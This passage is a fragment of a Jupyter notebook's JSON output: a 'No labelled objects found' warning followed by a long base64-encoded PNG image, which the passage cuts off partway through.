" warnings.warn(\"No labelled objects found. \"\n"
]
},
{
"data": {
"image/png": "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